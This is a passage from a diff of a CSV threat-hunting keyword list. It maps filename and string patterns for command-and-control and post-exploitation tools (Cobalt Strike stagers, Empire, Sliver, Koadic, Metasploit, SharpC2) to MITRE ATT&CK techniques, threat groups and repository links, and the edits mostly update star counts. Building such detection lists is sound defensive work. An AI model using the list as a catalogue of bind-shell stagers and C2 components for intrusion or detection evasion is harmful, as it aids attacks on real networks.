TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*stage_transform_x86_strrep1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*Stage-gSharedInfoBitmap*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*stageless payload*","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","10","10","980","241","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z" -"*StageListenerCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*StageListenerCmd*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*stager/js/bitsadmin *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/disk*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*stager/js/mshta*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" 
@@ -17326,56 +17509,56 @@ "*stager_bind_pipe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 
- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*stager_bind_tcp*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*stager_hidden_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*stager_sock_find.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*stagers/*/aes.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*stagers/*/diffiehellman.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*stagers/*/get_sysinfo.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*stagers/*/rc4.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stager_hidden_bind_tcp.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stager_sock_find.asm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*stagers/*/aes.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/diffiehellman.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/get_sysinfo.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*stagers/*/rc4.py*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1049","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Stagers\ExeStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Stagers\SvcStager\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*stagerx64.bin*","offensive_tool_keyword","AlanFramework","Alan Framework is 
